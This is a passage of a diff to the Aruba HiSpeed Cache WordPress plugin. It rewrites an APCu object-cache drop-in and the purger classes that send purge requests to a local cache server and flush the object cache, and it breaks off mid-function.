-				if ( false !== $result ) {
-					@ ++$this->stats['add'];
-					$this->group_ops[$group][] = "add $id";
-					$this->cache[$key] = $data;
-				}
-
-				return $result;
-			}
-
-			function add_global_groups( $groups ) {
-				if ( !is_array( $groups ) )
-					$groups = (array) $groups;
-
-				$this->global_groups = array_merge( $this->global_groups, $groups );
-				$this->global_groups = array_unique( $this->global_groups );
-			}
-
-			function add_non_persistent_groups( $groups ) {
-				if ( !is_array( $groups ) )
-					$groups = (array) $groups;
-
-				$this->no_mc_groups = array_merge( $this->no_mc_groups, $groups );
-				$this->no_mc_groups = array_unique( $this->no_mc_groups );
-			}
-
-			// This is named incr2 because Batcache looks for incr
-			// We will define that in a class extension if it is available (APC 3.1.1 or higher)
-			function incr2( $id, $n = 1, $group = 'default' ) {
-				$key = $this->key( $id, $group );
-				if ( function_exists( 'apc_inc' ) )
-					return apcu_inc( $key, $n );
-				else
-					return false;
-			}
-
-			function decr( $id, $n = 1, $group = 'default' ) {
-				$key = $this->key( $id, $group );
-				if ( function_exists( 'apc_dec' ) )
-					return apcu_dec( $id, $n );
-				else
-					return false;
-			}
-
-			function close() {
-				return true;
-			}
-
-			function delete( $id, $group = 'default' ) {
-				$key = $this->key( $id, $group );
-
-				if ( in_array( $group, $this->no_mc_groups ) ) {
-					unset( $this->cache[$key] );
-					return true;
-				}
-
-				$result = apcu_delete( $key );
-
-				@ ++$this->stats['delete'];
-				$this->group_ops[$group][] = "delete $id";
-
-				if ( false !== $result )
-					unset( $this->cache[$key] );
-
-				return $result;
-			}
-
-			function flush() {
-				// Don't flush if multi-blog.
-				if ( function_exists( 'is_site_admin' ) || defined( 'CUSTOM_USER_TABLE' ) && defined( 'CUSTOM_USER_META_TABLE' ) )
-					return true;
-
-				$this->cache = array();
-				return apcu_clear_cache();
-			}
-
-			function get($id, $group = 'default', $force = false) {
-				$key = $this->key($id, $group);
-
-				if ( isset($this->cache[$key]) && ( !$force || in_array($group, $this->no_mc_groups) ) ) {
-					if ( is_object( $this->cache[$key] ) )
-						$value = clone $this->cache[$key];
-					else
-						$value = $this->cache[$key];
-				} else if ( in_array($group, $this->no_mc_groups) ) {
-					$this->cache[$key] = $value = false;
-				} else {
-					$value = apcu_fetch( $key );
-					if ( is_object( $value ) && 'ArrayObject' == get_class( $value ) )
-						$value = $value->getArrayCopy();
-					if ( NULL === $value )
-						$value = false;
-					$this->cache[$key] = ( is_object( $value ) ) ? clone $value : $value;
-				}
-
-				@ ++$this->stats['get'];
-				$this->group_ops[$group][] = "get $id";
-
-				if ( 'checkthedatabaseplease' === $value ) {
-					unset( $this->cache[$key] );
-					$value = false;
-				}
-
-				return $value;
-			}
-
-			function key( $key, $group ) {
-				global $blog_id, $table_prefix;
-				if ( empty( $group ) )
-					$group = 'default';
-
-				if ( false !== array_search( $group, $this->global_groups ) )
-					$prefix =  $table_prefix;
-				else
-					$prefix =( is_multisite() ? $blog_id : $table_prefix );
-
-				return WP_APC_KEY_SALT . ':' . $this->abspath . ":$prefix$group:$key";
-			}
-
-			function replace( $id, $data, $group = 'default', $expire = 0 ) {
-				return $this->set( $id, $data, $group, $expire );
-			}
-
-			function set( $id, $data, $group = 'default', $expire = 0 ) {
-				$key = $this->key( $id, $group );
-				if ( isset( $this->cache[$key] ) && ('checkthedatabaseplease' === $this->cache[$key] ) )
-					return false;
-
-				if ( is_object( $data ) )
-					$data = clone $data;
-
-				$store_data = $data;
-
-				if ( is_array( $data ) )
-					$store_data = new ArrayObject( $data );
-
-				$this->cache[$key] = $data;
-
-				if ( in_array( $group, $this->no_mc_groups ) )
-					return true;
-
-				$expire = ( $expire == 0 ) ? $this->default_expiration : $expire;
-				$result = apcu_store( $key, $store_data, $expire );
-
-				return $result;
-			}
-
-			function switch_to_blog( $blog_id ) {
-				global $table_prefix;
-
-				$blog_id = (int) $blog_id;
-				$this->blog_prefix = ( is_multisite() ? $blog_id : $table_prefix ) . ':';
-			}
-/*
-			function stats() {
-				echo "<p>n";
-				foreach ( $this->stats as $stat => $n ) {
-					echo "<strong>" . esc_html( $stat ) . "</strong> " . esc_html( $n );
-					echo "<br/>n";
-				}
-				echo "</p>n";
-				echo "<h3>APC:</h3>";
-				foreach ( $this->group_ops as $group => $ops ) {
-					if ( !isset( $_GET['debug_queries'] ) && 500 < count( $ops ) ) {
-						$ops = array_slice( $ops, 0, 500 );
-						echo "<big>Too many to show! <a href='" . esc_url( add_query_arg( 'debug_queries', 'true' ) ) . "'>Show them anyway</a>.</big>n";
-					}
-					echo "<h4>" . esc_html($group) . " commands</h4>";
-					echo "<pre>n";
-					$lines = array();
-					foreach ( $ops as $op ) {
-						$lines[] = esc_html( $op );
-					}
-					print_r($lines);
-					echo "</pre>n";
-				}
-				if ( $this->debug ) {
-					$apc_info = apcu_cache_info();
-					echo "<p>";
-					echo "<strong>Cache Hits:</strong> " . esc_html( $apc_info['num_hits'] ) . "<br/>n";
-					echo "<strong>Cache Misses:</strong> " . esc_html( $apc_info['num_misses'] ) . "n";
-					echo "</p>n";
-				}
-			}*/
-
-			function WP_Object_Cache() {
-				$this->abspath = md5( ABSPATH );
-
-				global $blog_id, $table_prefix;
-				$this->global_prefix = '';
-				$this->blog_prefix = '';
-				if ( function_exists( 'is_multisite' ) ) {
-					$this->global_prefix = ( is_multisite() || defined('CUSTOM_USER_TABLE') && defined('CUSTOM_USER_META_TABLE') ) ? '' : $table_prefix;
-					$this->blog_prefix = ( is_multisite() ? $blog_id : $table_prefix ) . ':';
-				}
-
-				$this->cache_hits =& $this->stats['get'];
-				$this->cache_misses =& $this->stats['add'];
-			}
-		}
-
-		if ( function_exists( 'apc_inc' ) ) {
-			class APC_Object_Cache extends WP_Object_Cache {
-				function incr( $id, $n = 1, $group = 'default' ) {
-					return parent::incr2( $id, $n, $group );
-				}
-			}
-		} else {
-			class APC_Object_Cache extends WP_Object_Cache {
-				// Blank
-			}
-		}
-
-	} // !function_exists( 'wp_cache_add' )
-
-else : // No APC
-	$GLOBALS['_wp_using_ext_object_cache'] = false; // This will get overridden as of WP 3.5, so we have to hook in to 'all':
-	require_once ( ABSPATH . WPINC . '/cache.php' );
+<?php
+if ( ! defined( 'ABSPATH' ) ) {
+	exit;
+}
+//@phpcs:ignoreFile
+if ( function_exists( 'apcu_fetch' ) ) :
+
+	if ( version_compare( '5.2.4', phpversion(), '>=' ) ) {
+		wp_die( 'The APC object cache backend requires PHP 5.2 or higher. You are running ' . esc_attr(phpversion()) . '. Please remove the <code>object-cache.php</code> file from your content directory.' );
+	}
+
+	if ( function_exists( 'wp_cache_add' ) ) {
+		// Regular die, not wp_die(), because it gets sandboxed and shown in a small iframe
+		die( '<strong>ERROR:</strong> This is <em>not</em> a plugin, and it should not be activated as one.<br /><br />Instead, <code>' . ((isset($_SERVER['DOCUMENT_ROOT']))? esc_attr(str_replace(esc_attr(wp_unslash($_SERVER['DOCUMENT_ROOT'])), '', __FILE__ )):""). '</code> must be moved to <code>' . esc_attr(str_replace( esc_attr(wp_unslash($_SERVER['DOCUMENT_ROOT'])), '', trailingslashit( WP_CONTENT_DIR ) ) ). 'object-cache.php</code>' );//@phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized
+	} else {
+
+// Users with setups where multiple installs share a common wp-config.php can use this
+// to guarantee uniqueness for the keys generated by this object cache
+		if ( !defined( 'WP_APC_KEY_SALT' ) )
+			define( 'WP_APC_KEY_SALT', 'wp' );
+
+		function wp_cache_add( $key, $data, $group = '', $expire = 0 ) {
+			global $wp_object_cache;
+
+			return $wp_object_cache->add( $key, $data, $group, $expire );
+		}
+
+		function wp_cache_incr( $key, $n = 1, $group = '' ) {
+			global $wp_object_cache;
+
+			return $wp_object_cache->incr2( $key, $n, $group );
+		}
+
+		function wp_cache_decr( $key, $n = 1, $group = '' ) {
+			global $wp_object_cache;
+
+			return $wp_object_cache->decr( $key, $n, $group );
+		}
+
+		function wp_cache_close() {
+			return true;
+		}
+
+		function wp_cache_delete( $key, $group = '' ) {
+			global $wp_object_cache;
+
+			return $wp_object_cache->delete( $key, $group );
+		}
+
+		function wp_cache_flush() {
+			global $wp_object_cache;
+
+			return $wp_object_cache->flush();
+		}
+
+		function wp_cache_get( $key, $group = '', $force = false ) {
+			global $wp_object_cache;
+
+			return $wp_object_cache->get( $key, $group, $force );
+		}
+
+		function wp_cache_init() {
+			global $wp_object_cache;
+
+			$wp_object_cache = new APC_Object_Cache();
+		}
+
+		function wp_cache_replace( $key, $data, $group = '', $expire = 0 ) {
+			global $wp_object_cache;
+
+			return $wp_object_cache->replace( $key, $data, $group, $expire );
+		}
+
+		function wp_cache_set( $key, $data, $group = '', $expire = 0 ) {
+			global $wp_object_cache;
+
+			if ( defined('WP_INSTALLING') == false )
+				return $wp_object_cache->set( $key, $data, $group, $expire );
+			else
+				return $wp_object_cache->delete( $key, $group );
+		}
+
+		function wp_cache_switch_to_blog( $blog_id ) {
+			global $wp_object_cache;
+
+			return $wp_object_cache->switch_to_blog( $blog_id );
+		}
+
+		function wp_cache_add_global_groups( $groups ) {
+			global $wp_object_cache;
+
+			$wp_object_cache->add_global_groups( $groups );
+		}
+
+		function wp_cache_add_non_persistent_groups( $groups ) {
+			global $wp_object_cache;
+
+			$wp_object_cache->add_non_persistent_groups( $groups );
+		}
+
+		class WP_Object_Cache {
+			var $global_groups = array();
+
+			var $no_mc_groups = array();
+
+			var $cache = array();
+			var $stats = array( 'get' => 0, 'delete' => 0, 'add' => 0 );
+			var $group_ops = array();
+
+			var $cache_enabled = true;
+			var $default_expiration = 0;
+			var $abspath = '';
+			var $debug = false;
+
+			function add( $id, $data, $group = 'default', $expire = 0 ) {
+				$key = $this->key( $id, $group );
+
+				if ( is_object( $data ) )
+					$data = clone $data;
+
+				$store_data = $data;
+
+				if ( is_array( $data ) )
+					$store_data = new ArrayObject( $data );
+
+				if ( in_array( $group, $this->no_mc_groups ) ) {
+					$this->cache[$key] = $data;
+					return true;
+				} elseif ( isset( $this->cache[$key] ) && $this->cache[$key] !== false ) {
+					return false;
+				}
+
+				$expire = ( $expire == 0 ) ? $this->default_expiration : $expire;
+
+				$result = apcu_add( $key, $store_data, $expire );
+				if ( false !== $result ) {
+					@ ++$this->stats['add'];
+					$this->group_ops[$group][] = "add $id";
+					$this->cache[$key] = $data;
+				}
+
+				return $result;
+			}
+
+			function add_global_groups( $groups ) {
+				if ( !is_array( $groups ) )
+					$groups = (array) $groups;
+
+				$this->global_groups = array_merge( $this->global_groups, $groups );
+				$this->global_groups = array_unique( $this->global_groups );
+			}
+
+			function add_non_persistent_groups( $groups ) {
+				if ( !is_array( $groups ) )
+					$groups = (array) $groups;
+
+				$this->no_mc_groups = array_merge( $this->no_mc_groups, $groups );
+				$this->no_mc_groups = array_unique( $this->no_mc_groups );
+			}
+
+			// This is named incr2 because Batcache looks for incr
+			// We will define that in a class extension if it is available (APC 3.1.1 or higher)
+			function incr2( $id, $n = 1, $group = 'default' ) {
+				$key = $this->key( $id, $group );
+				if ( function_exists( 'apc_inc' ) )
+					return apcu_inc( $key, $n );
+				else
+					return false;
+			}
+
+			function decr( $id, $n = 1, $group = 'default' ) {
+				$key = $this->key( $id, $group );
+				if ( function_exists( 'apc_dec' ) )
+					return apcu_dec( $id, $n );
+				else
+					return false;
+			}
+
+			function close() {
+				return true;
+			}
+
+			function delete( $id, $group = 'default' ) {
+				$key = $this->key( $id, $group );
+
+				if ( in_array( $group, $this->no_mc_groups ) ) {
+					unset( $this->cache[$key] );
+					return true;
+				}
+
+				$result = apcu_delete( $key );
+
+				@ ++$this->stats['delete'];
+				$this->group_ops[$group][] = "delete $id";
+
+				if ( false !== $result )
+					unset( $this->cache[$key] );
+
+				return $result;
+			}
+
+			function flush() {
+				// Don't flush if multi-blog.
+				if ( function_exists( 'is_site_admin' ) || defined( 'CUSTOM_USER_TABLE' ) && defined( 'CUSTOM_USER_META_TABLE' ) )
+					return true;
+
+				$this->cache = array();
+				return apcu_clear_cache();
+			}
+
+			function get($id, $group = 'default', $force = false) {
+				$key = $this->key($id, $group);
+
+				if ( isset($this->cache[$key]) && ( !$force || in_array($group, $this->no_mc_groups) ) ) {
+					if ( is_object( $this->cache[$key] ) )
+						$value = clone $this->cache[$key];
+					else
+						$value = $this->cache[$key];
+				} else if ( in_array($group, $this->no_mc_groups) ) {
+					$this->cache[$key] = $value = false;
+				} else {
+					$value = apcu_fetch( $key );
+					if ( is_object( $value ) && 'ArrayObject' == get_class( $value ) )
+						$value = $value->getArrayCopy();
+					if ( NULL === $value )
+						$value = false;
+					$this->cache[$key] = ( is_object( $value ) ) ? clone $value : $value;
+				}
+
+				@ ++$this->stats['get'];
+				$this->group_ops[$group][] = "get $id";
+
+				if ( 'checkthedatabaseplease' === $value ) {
+					unset( $this->cache[$key] );
+					$value = false;
+				}
+
+				return $value;
+			}
+
+			function key( $key, $group ) {
+				global $blog_id, $table_prefix;
+				if ( empty( $group ) )
+					$group = 'default';
+
+				if ( false !== array_search( $group, $this->global_groups ) )
+					$prefix =  $table_prefix;
+				else
+					$prefix =( is_multisite() ? $blog_id : $table_prefix );
+
+				return WP_APC_KEY_SALT . ':' . $this->abspath . ":$prefix$group:$key";
+			}
+
+			function replace( $id, $data, $group = 'default', $expire = 0 ) {
+				return $this->set( $id, $data, $group, $expire );
+			}
+
+			function set( $id, $data, $group = 'default', $expire = 0 ) {
+				$key = $this->key( $id, $group );
+				if ( isset( $this->cache[$key] ) && ('checkthedatabaseplease' === $this->cache[$key] ) )
+					return false;
+
+				if ( is_object( $data ) )
+					$data = clone $data;
+
+				$store_data = $data;
+
+				if ( is_array( $data ) )
+					$store_data = new ArrayObject( $data );
+
+				$this->cache[$key] = $data;
+
+				if ( in_array( $group, $this->no_mc_groups ) )
+					return true;
+
+				$expire = ( $expire == 0 ) ? $this->default_expiration : $expire;
+				$result = apcu_store( $key, $store_data, $expire );
+
+				return $result;
+			}
+
+			function switch_to_blog( $blog_id ) {
+				global $table_prefix;
+
+				$blog_id = (int) $blog_id;
+				$this->blog_prefix = ( is_multisite() ? $blog_id : $table_prefix ) . ':';
+			}
+/*
+			function stats() {
+				echo "<p>n";
+				foreach ( $this->stats as $stat => $n ) {
+					echo "<strong>" . esc_html( $stat ) . "</strong> " . esc_html( $n );
+					echo "<br/>n";
+				}
+				echo "</p>n";
+				echo "<h3>APC:</h3>";
+				foreach ( $this->group_ops as $group => $ops ) {
+					if ( !isset( $_GET['debug_queries'] ) && 500 < count( $ops ) ) {
+						$ops = array_slice( $ops, 0, 500 );
+						echo "<big>Too many to show! <a href='" . esc_url( add_query_arg( 'debug_queries', 'true' ) ) . "'>Show them anyway</a>.</big>n";
+					}
+					echo "<h4>" . esc_html($group) . " commands</h4>";
+					echo "<pre>n";
+					$lines = array();
+					foreach ( $ops as $op ) {
+						$lines[] = esc_html( $op );
+					}
+					print_r($lines);
+					echo "</pre>n";
+				}
+				if ( $this->debug ) {
+					$apc_info = apcu_cache_info();
+					echo "<p>";
+					echo "<strong>Cache Hits:</strong> " . esc_html( $apc_info['num_hits'] ) . "<br/>n";
+					echo "<strong>Cache Misses:</strong> " . esc_html( $apc_info['num_misses'] ) . "n";
+					echo "</p>n";
+				}
+			}*/
+
+			function WP_Object_Cache() {
+				$this->abspath = md5( ABSPATH );
+
+				global $blog_id, $table_prefix;
+				$this->global_prefix = '';
+				$this->blog_prefix = '';
+				if ( function_exists( 'is_multisite' ) ) {
+					$this->global_prefix = ( is_multisite() || defined('CUSTOM_USER_TABLE') && defined('CUSTOM_USER_META_TABLE') ) ? '' : $table_prefix;
+					$this->blog_prefix = ( is_multisite() ? $blog_id : $table_prefix ) . ':';
+				}
+
+				$this->cache_hits =& $this->stats['get'];
+				$this->cache_misses =& $this->stats['add'];
+			}
+		}
+
+		if ( function_exists( 'apc_inc' ) ) {
+			class APC_Object_Cache extends WP_Object_Cache {
+				function incr( $id, $n = 1, $group = 'default' ) {
+					return parent::incr2( $id, $n, $group );
+				}
+			}
+		} else {
+			class APC_Object_Cache extends WP_Object_Cache {
+				// Blank
+			}
+		}
+
+	} // !function_exists( 'wp_cache_add' )
+
+else : // No APC
+	$GLOBALS['_wp_using_ext_object_cache'] = false; // This will get overridden as of WP 3.5, so we have to hook in to 'all':
+	require_once ( ABSPATH . WPINC . '/cache.php' );
 endif;
 No newline at end of file
--- a/aruba-hispeed-cache/src/Purger/AbstractPurger.php
+++ b/aruba-hispeed-cache/src/Purger/AbstractPurger.php
@@ -1,174 +1,174 @@
-<?php //@phpcs:ignore WordPress.Files.FileName.NotHyphenatedLowercase
-/**
- * ArubaHiSpeedCacheWpPurger
- * php version 5.6
- *
- * @category Wordpress-plugin
- * @package  Aruba-HiSpeed-Cache
- * @author   Aruba Developer <hispeedcache.developer@aruba.it>
- * @license  https://www.gnu.org/licenses/gpl-3.0.html GPLv3
- * @link     ArubaHiSpeedCacheRun_Aruba_Hispeed_cache()
- * @since    1.1.3
- */
-
-namespace ArubaSPAHiSpeedCachePurger;
-
-if ( ! class_exists( __NAMESPACE__ . 'AbstractPurger' ) ) {
-	// phpcs:disable WordPress.NamingConventions
-	/**
-	 * AbstracPurger.
-	 */
-	abstract class AbstractPurger {
-		/**
-		 * $servr_host for the requst
-		 *
-		 * @var string
-		 */
-		protected $serverHost;
-
-		/**
-		 * $server_port for the request
-		 *
-		 * @var string
-		 */
-		protected $serverPort;
-
-		/**
-		 * $time_out of request
-		 *
-		 * @var integer
-		 */
-		protected $timeOut;
-
-		/**
-		 * Purge the cache of a single page
-		 *
-		 * @param  string $url The url to purge.
-		 * @return void
-		 */
-		abstract public function purgeUrl( $url );
-
-		/**
-		 * Purge the cache of a list of pages
-		 *
-		 * @param  array $urls The urls to purge.
-		 * @return void
-		 */
-		abstract public function purgeUrls( $urls );
-
-		/**
-		 * Purge the alla chace of site
-		 *
-		 * @return void
-		 */
-		abstract public function purgeAll();
-
-		/**
-		 * DoRemoteGet
-		 *
-		 * @param string $target path to purge.
-		 *
-		 * @return void
-		 */
-		abstract public function doRemoteGet( $target = '/' );
-
-		/**
-		 * PreparePurgeRequestUri
-		 *
-		 * @param string $url Url to prepare.
-		 *
-		 * @return string for the purge request.
-		 */
-		public function preparePurgeRequestUri( $url ) {
-			return sprintf(
-				'http://%s:%s/purge%s',
-				$this->getServerHost(),
-				$this->getServerPort(),
-				preg_replace( '|^(https?:)?//[^/]+(/?.*)|i', '$2', filter_var( $url, FILTER_SANITIZE_URL ) )
-			);
-		}
-
-		/**
-		 * Set the purger.
-		 *
-		 *  $config [
-		 *  'time_out'     => int 5;
-		 *  'server_host'  => string '127.0.0.1'
-		 *  'server_port'  => string '8889'
-		 *  ];
-		 *
-		 * @param  array $configs The confi for the purger.
-		 * @return void
-		 */
-		public function setPurger( $configs ) {
-			$this->setTimeOut( $configs['time_out'] );
-			$this->setServerHost( $configs['server_host'] );
-			$this->setServerPort( $configs['server_port'] );
-		}
-
-		/**
-		 * Get undocumented variable
-		 *
-		 * @return integer
-		 */
-		public function getTimeOut() {
-			return $this->timeOut;
-		}
-
-		/**
-		 * Set undocumented variable
-		 *
-		 * @param integer $timeOut Undocumented variable.
-		 *
-		 * @return self
-		 */
-		public function setTimeOut( $timeOut ) {
-			$this->timeOut = $timeOut;
-
-			return $this;
-		}
-
-		/**
-		 * Get undocumented variable
-		 *
-		 * @return string
-		 */
-		public function getServerPort() {
-			return $this->serverPort;
-		}
-
-		/**
-		 * Set undocumented variable
-		 *
-		 * @param string $serverPort Undocumented variable.
-		 *
-		 * @return self
-		 */
-		public function setServerPort( $serverPort ) {
-			$this->serverPort = $serverPort;
-			return $this;
-		}
-
-		/**
-		 * Get undocumented variable
-		 *
-		 * @return string
-		 */
-		public function getServerHost() {
-			return $this->serverHost;
-		}
-
-		/**
-		 * Set undocumented variable
-		 *
-		 * @param string $serverHost Undocumented variable.
-		 *
-		 * @return self
-		 */
-		public function setServerHost( $serverHost ) {
-			$this->serverHost = $serverHost;
-			return $this;
-		}
-	}
-	// phpcs:enable
-}
+<?php //@phpcs:ignore WordPress.Files.FileName.NotHyphenatedLowercase
+/**
+ * ArubaHiSpeedCacheWpPurger
+ * php version 5.6
+ *
+ * @category Wordpress-plugin
+ * @package  Aruba-HiSpeed-Cache
+ * @author   Aruba Developer <hispeedcache.developer@aruba.it>
+ * @license  https://www.gnu.org/licenses/gpl-3.0.html GPLv3
+ * @link     ArubaHiSpeedCacheRun_Aruba_Hispeed_cache()
+ * @since    1.1.3
+ */
+
+namespace ArubaSPAHiSpeedCachePurger;
+
+if ( ! class_exists( __NAMESPACE__ . 'AbstractPurger' ) ) {
+	// phpcs:disable WordPress.NamingConventions
+	/**
+	 * AbstracPurger.
+	 */
+	abstract class AbstractPurger {
+		/**
+		 * $servr_host for the requst
+		 *
+		 * @var string
+		 */
+		protected $serverHost;
+
+		/**
+		 * $server_port for the request
+		 *
+		 * @var string
+		 */
+		protected $serverPort;
+
+		/**
+		 * $time_out of request
+		 *
+		 * @var integer
+		 */
+		protected $timeOut;
+
+		/**
+		 * Purge the cache of a single page
+		 *
+		 * @param  string $url The url to purge.
+		 * @return void
+		 */
+		abstract public function purgeUrl( $url );
+
+		/**
+		 * Purge the cache of a list of pages
+		 *
+		 * @param  array $urls The urls to purge.
+		 * @return void
+		 */
+		abstract public function purgeUrls( $urls );
+
+		/**
+		 * Purge the alla chace of site
+		 *
+		 * @return void
+		 */
+		abstract public function purgeAll();
+
+		/**
+		 * DoRemoteGet
+		 *
+		 * @param string $target path to purge.
+		 *
+		 * @return void
+		 */
+		abstract public function doRemoteGet( $target = '/' );
+
+		/**
+		 * PreparePurgeRequestUri
+		 *
+		 * @param string $url Url to prepare.
+		 *
+		 * @return string for the purge request.
+		 */
+		public function preparePurgeRequestUri( $url ) {
+			return sprintf(
+				'http://%s:%s/purge%s',
+				$this->getServerHost(),
+				$this->getServerPort(),
+				preg_replace( '|^(https?:)?//[^/]+(/?.*)|i', '$2', filter_var( $url, FILTER_SANITIZE_URL ) )
+			);
+		}
+
+		/**
+		 * Set the purger.
+		 *
+		 *  $config [
+		 *  'time_out'     => int 5;
+		 *  'server_host'  => string '127.0.0.1'
+		 *  'server_port'  => string '8889'
+		 *  ];
+		 *
+		 * @param  array $configs The confi for the purger.
+		 * @return void
+		 */
+		public function setPurger( $configs ) {
+			$this->setTimeOut( $configs['time_out'] );
+			$this->setServerHost( $configs['server_host'] );
+			$this->setServerPort( $configs['server_port'] );
+		}
+
+		/**
+		 * Get undocumented variable
+		 *
+		 * @return integer
+		 */
+		public function getTimeOut() {
+			return $this->timeOut;
+		}
+
+		/**
+		 * Set undocumented variable
+		 *
+		 * @param integer $timeOut Undocumented variable.
+		 *
+		 * @return self
+		 */
+		public function setTimeOut( $timeOut ) {
+			$this->timeOut = $timeOut;
+
+			return $this;
+		}
+
+		/**
+		 * Get undocumented variable
+		 *
+		 * @return string
+		 */
+		public function getServerPort() {
+			return $this->serverPort;
+		}
+
+		/**
+		 * Set undocumented variable
+		 *
+		 * @param string $serverPort Undocumented variable.
+		 *
+		 * @return self
+		 */
+		public function setServerPort( $serverPort ) {
+			$this->serverPort = $serverPort;
+			return $this;
+		}
+
+		/**
+		 * Get undocumented variable
+		 *
+		 * @return string
+		 */
+		public function getServerHost() {
+			return $this->serverHost;
+		}
+
+		/**
+		 * Set undocumented variable
+		 *
+		 * @param string $serverHost Undocumented variable.
+		 *
+		 * @return self
+		 */
+		public function setServerHost( $serverHost ) {
+			$this->serverHost = $serverHost;
+			return $this;
+		}
+	}
+	// phpcs:enable
+}
--- a/aruba-hispeed-cache/src/Purger/WpPurger.php
+++ b/aruba-hispeed-cache/src/Purger/WpPurger.php
@@ -1,196 +1,196 @@
-<?php //@phpcs:ignore WordPress.Files.FileName.NotHyphenatedLowercase
-/**
- * ArubaHiSpeedCacheWpPurger
- * php version 5.6
- *
- * @category Wordpress-plugin
- * @package  Aruba-HiSpeed-Cache
- * @author   Aruba Developer <hispeedcache.developer@aruba.it>
- * @license  https://www.gnu.org/licenses/gpl-3.0.html GPLv3
- * @link     ArubaHiSpeedCacheRun_Aruba_Hispeed_cache()
- * @since    1.1.3
- */
-
-namespace ArubaSPAHiSpeedCachePurger;
-
-if ( ! class_exists( __NAMESPACE__ . 'WpPurger' ) ) {
-	// phpcs:disable WordPress.NamingConventions
-	/**
-	 * Undocumented class
-	 */
-	class WpPurger extends AbstractPurger {
-
-		/**
-		 * Purge the cache of a single page
-		 *
-		 * @param  string $url The url to purge.
-		 * @return void
-		 */
-		public function purgeUrl( $url ) {
-			// $site_url = $this->getParseSiteUrl();
-			// $host = $site_url['host'];
-
-			$_url = filter_var( $url, FILTER_SANITIZE_URL );
-
-			// Logger.
-			if(class_exists('ArubaSPAHiSpeedCacheDebugLogger')) {
-				// Logger.
-				AHSC_log(  'targhet ' . $_url, 'purgeUrl()'  );
-				// Logger.
-			}
-			// Logger.
-
-			$this->doRemoteGet( $_url );
-
-			delete_expired_transients(true);
-			$this->flush_wp_object_cache();
-
-			$this->cache_warmer();
-		}
-
-		/**
-		 * Purge the cache of a list of pages
-		 *
-		 * @param  array $urls The urls to purge.
-		 * @return void
-		 */
-		public function purgeUrls( $urls ) {
-			foreach ( $urls as $url ) {
-				$this->doRemoteGet( $url );
-
-				// Logger.
-				if(class_exists('ArubaSPAHiSpeedCacheDebugLogger')) {
-					// Logger.
-					AHSC_log(  'targhet ' . $url, 'purgeUrl()' );
-					// Logger.
-				}
-				// Logger.
-			}
-
-
-			delete_expired_transients(true);
-			$this->flush_wp_object_cache();
-
-			$this->cache_warmer();
-		}
-
-		/**
-		 * Purge the alla chace of site
-		 *
-		 * @return void
-		 */
-		public function purgeAll() {
-			// Logger.
-			global $logger;
-
-			if(class_exists('ArubaSPAHiSpeedCacheDebugLogger')) {
-				// Logger.
-				AHSC_log( 'targhet /', 'purgeAll()' );
-				// Logger.
-			}
-
-			$this->doRemoteGet( '/' );
-
-			delete_expired_transients(true);
-			$this->flush_wp_object_cache();
-
-			$this->cache_warmer();
-		}
-
-		/**
-		 * DoRemoteGet
-		 *
-		 * @param string $target path to purge.
-		 *
-		 * @return void
-		 */
-		public function doRemoteGet( $target = '/' ) {
-			$purgeUrl = $this->preparePurgeRequestUri( $target );
-
-			$blog_id = null;
-
-			if ( is_multisite() ) {
-				$blog_id = get_current_blog_id();
-			}
-
-			$host = wp_parse_url( get_site_url( $blog_id ) );
-			$host = $host['host'];
-
-			// Logger.
-			global $logger;
-
-			if(class_exists('ArubaSPAHiSpeedCacheDebugLogger')) {
-				// Logger.
-				AHSC_log( $purgeUrl, '_targhet' );
-				// Logger.
-			}
-			// Logger.
-
-			wp_remote_get(
-				$purgeUrl,
-				array(
-					'timeout' => $this->timeOut,
-					'headers' => array(
-						'Host' => $host,
-					),
-				)
-			);
-		}
-
-		/**
-		 * Whap form wp_cache_flush.
-		 *
-		 * @see https://developer.wordpress.org/reference/functions/wp_cache_flush/.
-		 *
-		 * @return bool
-		 */
-		public function flush_wp_object_cache() {
-			$wp_object_cache = wp_cache_flush();
-			if ( $wp_object_cache ) {
-				// Logger.
-				global $logger;
-
-				if(class_exists('ArubaSPAHiSpeedCacheDebugLogger') ) {
-					// Logger.
-					AHSC_log( 'flush wp_object_cache with success....' ,'flush_wp_object_cache');
-					// Logger.
-				}
-				// Logger.
-			}
-			return $wp_object_cache;
-		}
-
-		/**
-		 * This function adds a transient that will be read with each subsequent request and will trigger the cache warming action.
-		 * If the ahsc_cache_warmer option is set to true.
-		 *
-		 * @return void
-		 */
-		public function cache_warmer() {
-			//$option = $this->container->get_service( 'ahsc_get_option' );
-			$cache_warmer = AHSC_CONSTANT['ARUBA_HISPEED_CACHE_OPTIONS']['ahsc_cache_warmer'];// (bool) $option( 'ahsc_cache_warmer' );
-
-
-			if ( $cache_warmer ) {
-				$do_warmer=get_option('ahsc_do_cache_warmer',false);
-				//$do_warmer             = ahsc_has_transient( 'ahsc_do_cache_warmer' );
-				$do_warmer_log_message = 'Transint warmer present';
-
-				if ( ! $do_warmer ) {
-					$do_warmer_log_message = 'Transint warmer non presente presente lo imposto : ';
-					update_option('ahsc_do_cache_warmer',true);
-					//$_r=ahsc_set_transient( 'ahsc_do_cache_warmer', time(), MINUTE_IN_SECONDS );
-					//$do_warmer_log_message.=(string)$_r;
-				}
-				global $logger;
-				if(class_exists('ArubaSPAHiSpeedCacheDebugLogger') ) {
-					// Logger.
-					AHSC_log( $do_warmer_log_message, 'Cache Warmer' );
-					// Logger.
-				}
-			}
-		}
-
-	}
-	// phpcs:enable
-}
+<?php //@phpcs:ignore WordPress.Files.FileName.NotHyphenatedLowercase
+/**
+ * ArubaHiSpeedCacheWpPurger
+ * php version 5.6
+ *
+ * @category Wordpress-plugin
+ * @package  Aruba-HiSpeed-Cache
+ * @author   Aruba Developer <hispeedcache.developer@aruba.it>
+ * @license  https://www.gnu.org/licenses/gpl-3.0.html GPLv3
+ * @link     ArubaHiSpeedCacheRun_Aruba_Hispeed_cache()
+ * @since    1.1.3
+ */
+
+namespace ArubaSPAHiSpeedCachePurger;
+
+if ( ! class_exists( __NAMESPACE__ . 'WpPurger' ) ) {
+	// phpcs:disable WordPress.NamingConventions
+	/**
+	 * Undocumented class
+	 */
+	class WpPurger extends AbstractPurger {
+
+		/**
+		 * Purge the cache of a single page
+		 *
+		 * @param  string $url The url to purge.
+		 * @return void
+		 */
+		public function purgeUrl( $url ) {
+			// $site_url = $this->getParseSiteUrl();
+			// $host = $site_url['host'];
+
+			$_url = filter_var( $url, FILTER_SANITIZE_URL );
+
+			// Logger.
+			if(class_exists('ArubaSPAHiSpeedCacheDebugLogger')) {
+				// Logger.
